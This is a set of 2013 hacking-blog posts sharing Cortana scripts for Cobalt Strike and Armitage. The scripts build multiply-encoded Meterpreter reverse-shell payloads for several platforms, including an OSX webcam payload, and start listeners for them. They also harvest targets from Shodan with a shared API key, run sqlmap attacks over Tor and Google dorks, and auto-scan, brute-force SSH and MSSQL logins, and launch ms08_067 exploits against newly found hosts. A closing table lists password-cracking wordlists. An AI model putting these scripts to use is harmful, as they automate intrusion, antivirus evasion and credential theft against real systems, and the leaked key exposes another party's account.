Security is just an Illusion

Tuesday, December 10, 2013

Cobalt Strike Report Hosts Mod

Posted by Security is just an illusion at Tuesday, December 10, 2013

Cobalt Strike has a nice Funktion called Report Hosts.

All “HOST/PORTS/OS/HASHS/EXPLOITS” informations exported into a single pdf file.

Now i want to change the Logo on the Top “you cant see it in the Sample Pic sry”

Original PDF Banner

My New PDF Banner

Cobal Strike is coded in Java we can simple extract the *jar file with 7zip or other tools.

27.09.2012  14:26    <DIR>          armitage
27.09.2012  14:26    <DIR>          cloudstrike
23.07.2010  09:00    <DIR>          com
27.09.2012  14:26    <DIR>          console
27.09.2012  14:26    <DIR>          cortana
23.12.2011  17:48    <DIR>          de
27.09.2012  14:26    <DIR>          dns
27.09.2012  14:26    <DIR>          endpoint
27.09.2012  14:26    <DIR>          graph
27.09.2012  14:26    <DIR>          images
19.11.2006  23:41    <DIR>          javax
06.08.2005  17:14    <DIR>          java_cup
04.09.2012  19:10            28.830 libtapmanager.so
04.09.2012  19:10            34.685 libtapmanager64.so
27.09.2012  14:26    <DIR>          license
16.05.2004  02:02            10.317 LICENSE.txt
13.12.2010  18:49               574 log4j.properties
23.07.2012  09:11    <DIR>          mail
27.09.2012  14:26    <DIR>          META-INF
27.09.2012  14:26    <DIR>          msf
14.11.2011  14:21    <DIR>          nl
16.05.2004  02:02               622 NOTICE.TXT
02.07.2010  14:04    <DIR>          org
27.09.2012  14:26    <DIR>          profiler
27.09.2012  14:26    <DIR>          report
27.09.2012  14:26    <DIR>          resources
27.09.2012  14:26    <DIR>          scripts
27.09.2012  14:26    <DIR>          scripts-cortana
24.05.2009  00:19    <DIR>          sleep
27.09.2012  14:26    <DIR>          ssl
27.09.2012  14:26    <DIR>          table
27.09.2012  14:26    <DIR>          tap
27.09.2012  14:26    <DIR>          template
27.09.2012  14:26    <DIR>          templates
27.09.2012  14:26    <DIR>          tree
27.09.2012  14:26    <DIR>          ui

After cobalt strike extract we can see the folder /images/ now we can change the logo and simple repack it into a .jar file.

Now We can start Cobalt Strike again with your new logo.

Before:

Activity Report by gotr00t

After :

Hosts Report by gotr00t

Have pfun if anybody need it ;)

Three Days with Cortana Script Engine - Cobalt Strike/Armitage

Posted by Security is just an illusion at Tuesday, December 10, 2013

Auto Payload Menu meets Cobalt Strike Script Engine

Bored again scripting a short Payload menu for Cobalt/Armitage

Some Screenshots :

Source Code :

# Multi Payload Menu Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyyy 
# from http://security-is-just-an-illusion.blogspot.de

menubar("Payloads", "payloads",2);

popup payloads {
menu "Windows Payloads" {
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Create\c4 Meterpreter x86 Reverse Tcp Payload Now \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Meterpreter x86 Reverse Tcp Payload");
	cmd($console, "msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor  -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor  -c 2 -t exe -o /root/Desktop/$filehandler");
	cmd($console, "use exploit/multi/handler");
	cmd($console, "set LHOST $ip");
        cmd($console, "set LPORT $port");
        cmd($console, "set PAYLOAD windows/meterpreter/reverse_tcp");
        cmd($console, "set Encoder x86/shikata_ga_nai");
        cmd($console, "set EXITFUNC process");
        cmd($console, "set ExitOnSession false");
        cmd($console, "exploit -j");
        println("----------------------------------------\n\c4Meterpreter\c4 x86 Reverse Tcp Payload Ready\n----------------------------------------");
        println("\c9Meterpreter\c9 LHOST $ip");
        println("\c9Meterpreter\c9 LPORT $port");
        println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");	
        println("\c9Meterpreter\c9 Encoder x86/shikata_ga_nai");
        println("\c9Meterpreter\c9 EXITFUNC process");
        println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
        println("\n----------------------------------------\n\       Security is just an Illusion\n----------------------------------------");			
}
}
item "Reverse Meta x64" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Create\c4 Meterpreter x64 Reverse Tcp Payload Now \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Meterpreter x64 Reverse Tcp Payload");
	cmd($console, "msfpayload windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X | msfencode -c 10 -e x86/shikata_ga_nai > /root/Desktop/$filehandler");
	cmd($console, "use exploit/multi/handler");
	cmd($console, "set LHOST $ip");
        cmd($console, "set LPORT $port");
        cmd($console, "set PAYLOAD windows/x64/meterpreter/reverse_tcp");
        cmd($console, "set Encoder x86/shikata_ga_nai");
        cmd($console, "set EXITFUNC process");
        cmd($console, "set ExitOnSession false");
        cmd($console, "exploit -j");
        println("----------------------------------------\n\c4Meterpreter\c4 x64 Reverse Tcp Payload Ready\n----------------------------------------");
        println("\c9Meterpreter\c9 LHOST $ip");
        println("\c9Meterpreter\c9 LPORT $port");
        println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");	
        println("\c9Meterpreter\c9 Encoder x64/shikata_ga_nai");
        println("\c9Meterpreter\c9 EXITFUNC process");
        println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
        println("\n----------------------------------------\n\       Security is just an Illusion\n----------------------------------------");			
}
}
}
menu "Android Payloads" {
item "Reverse Meta Java" {
$ip = prompt_text("Enter Host for Android Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Android Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Create\c4 Meterpreter Android Reverse Tcp Payload Now \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Meterpreter Android Reverse Tcp Payload");
	cmd($console, "msfpayload android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > /root/Desktop/$filehandler");
	cmd($console, "use exploit/multi/handler");
	cmd($console, "set LHOST $ip");
        cmd($console, "set LPORT $port");
        cmd($console, "set PAYLOAD android/meterpreter/reverse_tcp");
        cmd($console, "exploit -j");
        println("----------------------------------------\n\c4Meterpreter\c4 Android Reverse Tcp Payload Ready\n----------------------------------------");
        println("\c9Meterpreter\c9 LHOST $ip");
        println("\c9Meterpreter\c9 LPORT $port");
        println("\c9Meterpreter\c9 PAYLOAD android/meterpreter/reverse_tcp");	
        println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
        println("\n----------------------------------------\n\       Security is just an Illusion\n----------------------------------------");			
}
}
}
menu "Linux Payloads" {
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Create\c4 Meterpreter Linux Reverse Tcp Payload Now \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Meterpreter Linux Reverse Tcp Payload");
	cmd($console, "msfpayload linux/x86/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
	cmd($console, "use exploit/multi/handler");
	cmd($console, "set LHOST $ip");
        cmd($console, "set LPORT $port");
        cmd($console, "set PAYLOAD linux/x86/meterpreter/reverse_tcp");
        cmd($console, "exploit -j");
        println("----------------------------------------\n\c4Meterpreter\c4 Linux Reverse Tcp Payload Ready\n----------------------------------------");
        println("\c9Meterpreter\c9 LHOST $ip");
        println("\c9Meterpreter\c9 LPORT $port");
        println("\c9Meterpreter\c9 PAYLOAD linux/x86/meterpreter/reverse_tcp");	
        println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
        println("\n----------------------------------------\n\       Security is just an Illusion\n----------------------------------------");			
}
}
item "Reverse Shell x64" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Create\c4 Shell Linux x64 Reverse Shell Payload Now \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Shell Linux Reverse Shell Payload");
	cmd($console, "msfpayload linux/x64/shell_reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
	cmd($console, "use exploit/multi/handler");
	cmd($console, "set LHOST $ip");
        cmd($console, "set LPORT $port");
        cmd($console, "set PAYLOAD linux/x64/shell_reverse_tcp");
        cmd($console, "exploit -j");
        println("----------------------------------------\n\c4Shell\c4 Linux x64 Reverse Shell Payload Ready\n----------------------------------------");
        println("\c9Meterpreter\c9 LHOST $ip");
        println("\c9Meterpreter\c9 LPORT $port");
        println("\c9Meterpreter\c9 PAYLOAD linux/x64/shell_reverse_tcp");	
        println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
        println("\n----------------------------------------\n\       Security is just an Illusion\n----------------------------------------");			
}
}
}
menu "OSX Payloads" {
item "Reverse iSight" {
$ip = prompt_text("Enter Host for OSX Reverse Tcp Payload");
$port = prompt_text("Enter Port for OSX Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Create\c4 OSX iSight Reverse Tcp Payload Now \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("OSX iSight Reverse Tcp Payload");
	cmd($console, "msfpayload osx/x86/isight/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
	cmd($console, "use exploit/multi/handler");
	cmd($console, "set LHOST $ip");
        cmd($console, "set LPORT $port");
        cmd($console, "set PAYLOAD osx/x86/isight/reverse_tcp");
        cmd($console, "exploit -j");
        println("----------------------------------------\n\c4OSX iSight \c4Reverse Tcp Payload Ready\n----------------------------------------");
        println("\c9Meterpreter\c9 LHOST $ip");
        println("\c9Meterpreter\c9 LPORT $port");
        println("\c9Meterpreter\c9 PAYLOAD osx/x86/isight/reverse_tcp");	
        println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
        println("\n----------------------------------------\n\       Security is just an Illusion\n----------------------------------------");			
}
}
}
menu "PHP Payloads" {
item "Reverse Meta PHP" {
$ip = prompt_text("Enter Host for PHP Reverse Tcp Payload");
$port = prompt_text("Enter Port for PHP Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Create\c4 Meterpreter PHP Reverse Tcp Payload Now \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Meterpreter PHP Reverse Tcp Payload");
	cmd($console, "msfpayload php/meterpreter_reverse_tcp LHOST=$ip LPORT=$port R | msfencode -c 1 -e php/base64 -t raw -o /root/Desktop/$filehandler");
	cmd($console, "use exploit/multi/handler");
	cmd($console, "set LHOST $ip");
        cmd($console, "set LPORT $port");
        cmd($console, "set PAYLOAD php/meterpreter_reverse_tcp");
        cmd($console, "set AutoSystemInfo 1");
        cmd($console, "exploit -j");
        println("----------------------------------------\n\c4Meterpreter\c4 PHP Reverse Tcp Payload Ready\n----------------------------------------");
        println("\c9Meterpreter\c9 LHOST $ip");
        println("\c9Meterpreter\c9 LPORT $port");
        println("\c9Meterpreter\c9 PAYLOAD php/meterpreter_reverse_tcp");	
        println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
        println("\n----------------------------------------\n\       Security is just an Illusion\n----------------------------------------");			
}
}
}
}

Saturday, December 7, 2013

Two Days with Cortana Script Engine - Cobalt Strike/Armitage

Posted by Security is just an illusion at Saturday, December 07, 2013

Shodanhq meets Cobalt Strike Script Engine

Maybe anybody can need it,Just a Simple Interface Script for Shodan Search Engine.

Here some Screenshots :

Enter Search Word Like “ssh2”

Be Happy ;)

Simple Script to parse all ips,sry im not a dev pro ;) No auto add ips atm….. maybe sometimes

Add Host Copy & Paste

Happy Hunting ---->

Its a littlebit buggi but it works .

Source code :

# Shodan API Query for Cobalt Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy 
# from http://security-is-just-an-illusion.blogspot.de
 
println("\n----------------------------------------\n\c4[*] Shodan API Query for Cobalt Engine v0.1 Loaded [*] \n----------------------------------------");
 
menubar("Web ToolKit", "webstuff",2);
 
popup webstuff {
menu "Shodan Search" {
item "Query Shodan Api" {
 
$ip = prompt_text("Enter Search Query");
$output = prompt_text("Enter File Name Log File Saved on Desktop");
if
($ip !is $null) {
show_message("Lets Pwn The Box!"); 
 
    println("\n----------------------------------------\n\c4[*] Get Targets from Shodan API \n----------------------------------------");
   $console = console();
   $console = open_console_tab("Get Targets from Shodan API");
 cmd($console, "use auxiliary/gather/shodan_search");
    cmd($console, "set MAXPAGE 5");
 cmd($console, "set SHODAN_APIKEY W6UgwFqFuejJvAEOZuRX5Jd6vXrbfN72");
    cmd($console, "set QUERY $ip");
 cmd($console, "set DATABASE 1");
        cmd($console, "set OUTFILE /root/Desktop/$output");
 cmd($console, "set VHOST www.shodanhq.com");
    cmd($console, "run -j");
        sleep(10 * 1000);
}
  cmd($console, "python /root/Desktop/shoda.py /root/Desktop/$output");
        db_sync(); 
}
}
}

Split Ips from Log File :

#!/usr/bin/python
#########################################################################
# ___ _ _ _____ ___ ____ __
# / __)( )_( )( _ )/ __)( _ \( )
# \__ \ ) _ ( )(_)( ( (_-.) / )(__
# (___/(_) (_)(_____)\___/(_)\_)(____) V0.21
# -some code borrowed from >> https://developers.shodan.io/index.html
# -rest created/mixed up by FIZZLESTICK
# -trollsohard[at]rebelbas.es
#
# MORE INFO COMING
#
# [changelog]
# 9/25/2013 v0.2 - written up for RC worth.. needs some IP/vs DNS handling
# 10/11/2013 v0.21 - cleaned up host output a bit, banners, formatting
#########################################################################
#!/usr/bin/env python
  
#import the necessary modules
import re #for regular expressions - to match ip's
import sys #for parsing command line opts
  
# I need to probably make this more pythonic but am working on that...
# if file is specified on command line, parse, else ask for file
if sys.argv[1:]:
    logfile = sys.argv[1]
else:
    logfile = raw_input("Please enter a file to parse, e.g /var/log/secure: ")
  
try:
    # open the file
    file = open(logfile, "r")
    # create an empty list
    ips = []
    # read through the file
    for text in file.readlines():
       #strip off the \n
        text = text.rstrip()
       #this is probably not the best way, but it works for now
        regex = re.findall(r'(?:\d{1,3}\.){3}\d{1,3}', text)
        # if the regex is not empty and is not already in ips list append
        if regex is not None and regex not in ips:
            ips.append(regex)
  
  
    #loop through the list
    for ip in ips:
        #I know there is argument as to whether the string join method is pythonic
        addy = "".join(ip)
        if addy is not '':
            print "%s"% (addy)
    #cleanup and close file
    file.close()
#catch any standard error (we can add more later)
except IOError, (errno, strerror):
    print "I/O Error(%s) : %s" % (errno, strerror)

INFO : Feel Free to use my Api Key :)

Friday, December 6, 2013

One Day with Cortana Script Engine - Cobalt Strike/Armitage

Posted by Security is just an illusion at Friday, December 06, 2013

Today i work a little bit with Cobalt Strike 21 Days Demo.

Really Great Pentest tool like Armitage http://www.advancedpentest.com/

After some time i found the Script menu into Cobalt Stike,letz google it what we can do with the Script Engine.

After a while a found a great pdf doko about the Contana Script Engine. Download the pdf here cortana_tutorial.pdf

Now letz play with it.

Contana Script Engine Lesson 1

Custom Armitage Menu via Cortana scripts

# Contana-Info Sites Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy 
# from http://security-is-just-an-illusion.blogspot.de

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Info Sites" {
item "Security is just an Illusion" {
url_open("http://security-is-just-an-illusion.blogspot.de/"
);
}
item "TheHackerNews" {
url_open("http://thehackernews.com/");
}
item "Securitytube" {
url_open("http://www.securitytube.net");
}
item "Shodanhq" {
url_open("http://www.shodanhq.com/");
}
item "Exploit-db" {
url_open("http://www.exploit-db.com/");
}
item "1337day" {
url_open("http://1337day.com/");
}
item "Privatepaste" {
url_open("http://privatepaste.com/");
}
item "Hash-cracker.com" {
url_open("http://www.hash-cracker.com/");
}
item "Rainbowtables.it64.com" {
url_open("http://rainbowtables.it64.com/");
}
item "X-attack.net" {
url_open("https://www.x-attack.net/?rtcrack");
}
}
}

Contana Script Engine Lesson 2

Custom Armitage Tor Network Menu via Cortana scripts

# Contana-Tor Network Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy 
# from http://security-is-just-an-illusion.blogspot.de


menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Tor Engine" {
item "Start Tor" {
        println("\n----------------------------------------\n\c4Starting\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Start Tor NetWork");
	cmd($console, "tor");
	#sleep(30 * 1000);
	db_sync()
}
item "Kill Tor" {
        println("\n----------------------------------------\n\c4Stop\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Kill Tor NetWork");
	cmd($console, "killall tor");
	#sleep(30 * 1000);
	db_sync()
}
item "Restart Tor" {
        println("\n----------------------------------------\n\c4Restart\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");	
	$console = console();
	$console = open_console_tab("Restart Tor NetWork");
	cmd($console, "killall tor && tor");
	#sleep(30 * 1000);
	db_sync()
}
}
}

Contana Script Engine Lesson 2

Custom Armitage Sqlmap Interface Menu via Cortana scripts

# Contana-Sqlmap Interface Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy 
# from http://security-is-just-an-illusion.blogspot.de
# Change Gnome Profile to avoid terminal close after exploit

println("\n----------------------------------------\n\c4[*] Contana-Sqlmap Engine v0.1 Loaded [*] \n----------------------------------------");

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Sqlmap" {
item "Attack" {

$ip = prompt_text("Target + option --dbs ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap\nIP: \c9$ip\c9 \n----------------------------------------");	
	$console = console();
	cmd($console, "gnome-terminal -x sqlmap --random-agent -u $ip ;bash");
        db_sync()
}
}
item "Attack over Tor" {

$ip = prompt_text("Target + option --dbs ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");	
	$console = console();
	cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -u $ip ;bash");
	db_sync()
}
}
item "Attack with GDork" {

$ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with google Dorks\nIP: \c9$ip\c9 \n----------------------------------------");	
	$console = console();
	cmd($console, "gnome-terminal -x sqlmap --random-agent -g $ip ;bash");
	db_sync()
}
}
item "Attack with GDork over Tor" {

$ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
        println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with Google Dorks over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");	
	$console = console();
	cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -g $ip ;bash");
	db_sync()
}
}
item "GDorks List" {
url_open("http://pastebin.com/raw.php?i=QFhBYbPw");
}
}
}

Contana Script Engine Lesson 3

Custom Armitage on Host add Auto TCP Port Quick Scan via Cortana scripts

# Contana-Quick-Scan Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy 
# from http://security-is-just-an-illusion.blogspot.de

println("\n----------------------------------------\n\c4[*] Contana-Quick-Scan Engine v0.1 Loaded [*] \n----------------------------------------");

# Preform auto scan
on host_add {
	sleep(10 * 1000);	
	println("\n----------------------------------------\n\c4[*] Scanning New Host \nIP : \c9$1\c9\n----------------------------------------");
	$console = console();
	#$console = open_console_tab("Scanning New Host");
	cmd($console, "use auxiliary/scanner/portscan/tcp");
	cmd($console, "set THREADS 100");
	cmd($console, "set PORTS 21, 22, 23, 25, 80, 110, 143, 443, 445, 1433, 3306, 4899, 5800, 5801, 8080");
	cmd($console, "set RHOSTS $1");
	cmd($console, "run -j");
	cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
	cmd($console, "set THREADS 100");
	cmd($console, "set BATCHSIZE 256");
	cmd($console, "set RHOSTS $1");
	cmd($console, "run -j");
	#sleep(30 * 1000);
	db_sync(); 
}

on service_add_21 {
        println("\n----------------------------------------\n\c4[*] FTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 21 Open\n----------------------------------------");
}

on service_add_22 {
        println("\n----------------------------------------\n\c4[*] SSH-SERVER FOUND \nIP : \c9$1\c9\nPort : 22 Open\n----------------------------------------");
}

on service_add_23 {
        println("\n----------------------------------------\n\c4[*] TELNET-SERVER FOUND \nIP : \c9$1\c9\nPort : 23 Open\n----------------------------------------");
}

on service_add_25 {
        println("\n----------------------------------------\n\c4[*] SMTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 25 Open\n----------------------------------------");
}

on service_add_80 {
        println("\n----------------------------------------\n\c4[*] WEB-SERVER FOUND \nIP : \c9$1\c9\nPort : 80 Open\n----------------------------------------");
}

on service_add_110 {
        println("\n----------------------------------------\n\c4[*] POP3-SERVER FOUND \nIP : \c9$1\c9\nPort : 110 Open\n----------------------------------------");
}

on service_add_143 {
        println("\n----------------------------------------\n\c4[*] IMAP-SERVER FOUND \nIP : \c9$1\c9\nPort : 143 Open\n----------------------------------------");
}

on service_add_443 {
        println("\n----------------------------------------\n\c4[*] HTTPS-SERVER FOUND \nIP : \c9$1\c9\nPort : 443 Open\n----------------------------------------");
}

on service_add_445 {
        println("\n----------------------------------------\n\c4[*] MICROSOFT-DS-SERVER FOUND \nIP : \c9$1\c9\nPort : 445 Open\n----------------------------------------");
}

on service_add_1433 {
        println("\n----------------------------------------\n\c4[*] MS-SQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 1433 Open\n----------------------------------------");
}

on service_add_3306 {
        println("\n----------------------------------------\n\c4[*] MYSQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 3306 Open\n----------------------------------------");
}

on service_add_4899 {
        println("\n----------------------------------------\n\c4[*] RADMIN-SERVER FOUND \nIP : \c9$1\c9\nPort : 4899 Open\n----------------------------------------");
}

on service_add_5800 {
        println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5800 Open\n----------------------------------------");
}

on service_add_5801 {
        println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5801 Open\n----------------------------------------");
}

on service_add_8080 {
        println("\n----------------------------------------\n\c4[*] Shared-Service-SERVER FOUND \nIP : \c9$1\c9\nPort : 8080 Open\n----------------------------------------");
}
# EOF

Contana Script Engine Lesson 4

Custom Armitage on Host add && port 22 found Auto Bruteforce via Cortana scripts

# Brute New Host with SSH Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/ 

# Preform auto msf port scan
# by monstream00

on host_add {
	sleep(10 * 1000);	
	println("[*] msfScanning New Host TCP/UDP on $1");
	$console = console();
	#$console = open_console_tab("TCP/UDPscan_$1"); #Debug use
	cmd($console, "use auxiliary/scanner/portscan/tcp");
	cmd($console, "set THREADS 100");
	cmd($console, "set PORTS 21, 22, 80, 110, 143, 443, 445, 1433, 3306, 8080");
	cmd($console, "set RHOSTS $1");
	cmd($console, "run -j");
	cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
	cmd($console, "set THREADS 100");
	cmd($console, "set BATCHSIZE 256");
	cmd($console, "set RHOSTS $1");
	cmd($console, "run -j");
	#sleep(30 * 1000);
	db_sync(); 
}


on service_add_22 {
        println("\n----------------------------------------\n\c4Attempting to bruteforce\c4 SSH-Server\nIP: \c9$1\c9 \n----------------------------------------");
        auxiliary("scanner/ssh/ssh_login", @($1), %(
                THREADS => '100',
                STOP_ON_SUCCESS => '1',
                USER_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_users.txt',
                PASS_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt'));
}

Brute New Host with MSSQL Server Ready on it

# Brute New Host with MSSQL Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/ 

on service_add_1433 {
        println("Attempting to brute force MSSQL-Server |$1|");
        auxiliary("scanner/mssql/mssql_login", @($1), %(
                USER_FILE => '/opt/framework3/msf3/data/wordlists/unix_users.txt',
                PASS_FILE => '/opt/framework3/msf3/data/wordlists/unix_passwords.txt'));
}

Contana Script Engine Lesson 4

Custom Armitage on Host add Auto Exploit via Cortana scripts

# Exploit New Host with microsoft-ds samba with the ms08_067_netapi exploit.
# by http://security-is-just-an-illusion.blogspot.de/ 

on service_add_445 {
println("[*]Exploiting $1 with ms08_067_netapi sploit (" . host_os($1) . ")");
if (host_os($1) eq "Microsoft Windows") {
exploit("windows/smb/ms08_067_netapi", $1);
}
else {
exploit("multi/samba/usermap_script", $1, $null, $null, 1);
}
}

Now Have pfun with Contana Script Engine ;)

Friday, November 29, 2013

Wordlist/Paswordlist for Dictionary Attack

Posted by Security is just an illusion at Friday, November 29, 2013

Dictionary	Passwords	Dictionary Size	Last Updated
Africaan	133507	1.6 MB	11/18/2010
Australian	79298	947 KB	11/18/2010
Belarusian (Classical Spelling)	1562837	20 MB	11/18/2010
Belarusian (Latin Spelling)	1562829	23 MB	11/18/2010
Belarusian (Modern Spelling)	1562992	20 MB	11/18/2010
Brazilian	129036	1.5 MB	11/18/2010
Chinese	648	4 KB	11/18/2010
Croatian	28233	283 KB	11/18/2010
Czech	290749	3.2 MB	11/18/2010
Danish	558727	7.6 MB	11/18/2010
Dutch	238990	3 MB	11/18/2010
English	318971	3.6 MB	11/18/2010
Finnish	378965	5 MB	11/18/2010
French	296102	3.5 MB	11/18/2010
Fungi	13546	160 KB	11/18/2010
German	1738418	21 MB	11/18/2010
Hindu	1501	12 KB	11/18/2010
Hungarian	17652	188 KB	11/18/2010
Italian	385750	4.5 MB	11/18/2010
Japanese	115233	1 MB	11/18/2010
Latin	86004	1 MB	11/18/2010
Norwegian	799198	13 MB	11/18/2010
Polish	3660917	46 MB	03/01/2013
Portuguese	32388	349 KB	11/18/2010
Romanian	1068102	13 MB	12/13/2012
Russian (Mini)	36054	362 KB	11/18/2010
Russian (Mini) - DOS	36054	362 KB	11/18/2010
Russian (Mini) - KOI8	36054	362 KB	11/18/2010
Russian (Full)	3066770	35 MB	11/18/2010
Russian (Full) - DOS	3066770	35 MB	11/18/2010
Russian (Full) - KOI8	3066770	35 MB	11/18/2010
Spanish	413527	4.8 MB	11/18/2010
Swahili	19784	215 KB	11/18/2010
Swedish	235420	2.8 MB	11/18/2010
Turkish	177121	2.6 MB	06/06/2013
Yiddish	92	1 KB	11/18/2010
Languages (Summary)	17579051	210 MB	11/18/2010

0...9999999	11111110	99 MB	11/18/2010
0...ffffff	17895696	139 MB	11/18/2010
Cain and Abel	306558	3.5 MB	11/18/2010
Case Mutation	6753188	64 MB	11/18/2010
Common	1496075	14 MB	11/18/2010
Cracklib	1777121	20 MB	11/18/2010
Dates	5891383	70 MB	11/18/2010
Facebook (Usernames)	18745243	283 MB	11/18/2010
Facebook (Words)	2026319	19 MB	11/18/2010
GDict	4442329	54 MB	11/18/2010
L33t	7799272	99 MB	11/18/2010
Thematic	3272030	33 MB	11/18/2010
Thematic (Summary)	1694280	18 MB	11/18/2010
Two Word	5653847	79 MB	11/18/2010

antichat.ru	3168698	29 MB	11/18/2010
freerainbowtables.com	276259	2.9 MB	11/18/2010
hashkiller.com	23685601	247 MB	11/18/2010
milw0rm.com	77950	703 KB	11/18/2010
plain-text.info	28729	276 KB	11/18/2010

InsidePro (Micro)	21623	170 KB	01/01/2012
InsidePro (Mini)	242298	1.9 MB	01/01/2012
InsidePro (Full) - 1	5000000	49 MB	11/18/2010
InsidePro (Full) - 2	5000000	49 MB	11/18/2010
InsidePro (Full) - 3	5000000	57 MB	11/18/2010
InsidePro (Full) - 4	5000000	42 MB	11/18/2010
InsidePro (Full) - 5	5000000	49 MB	11/18/2010
InsidePro (Full) - 6	5000000	48 MB	11/18/2010
InsidePro (Full) - 7	5000000	51 MB	11/18/2010
InsidePro (Full) - 8	5000000	56 MB	11/18/2010
InsidePro (Full) - 9	5000000	51 MB	11/18/2010
InsidePro (Full) - 10	5000000	56 MB	11/18/2010
InsidePro (Full) - 11	5000000	46 MB	11/18/2010
InsidePro (Full) - 12	5000000	56 MB	11/18/2010
InsidePro (Full) - 13	5000000	52 MB	11/18/2010
InsidePro (Full) - 14	5000000	50 MB	11/18/2010
InsidePro (Full) - 15	5000000	56 MB	11/18/2010
InsidePro (Full) - 16	5000000	55 MB	11/18/2010
InsidePro (Full) - 17	5000000	57 MB	11/18/2010
InsidePro (Full) - 18	5000000	32 MB	11/24/2010
InsidePro (Full) - 19	5000000	46 MB	05/15/2011
InsidePro (Full) - 20	5000000	47 MB	05/15/2011
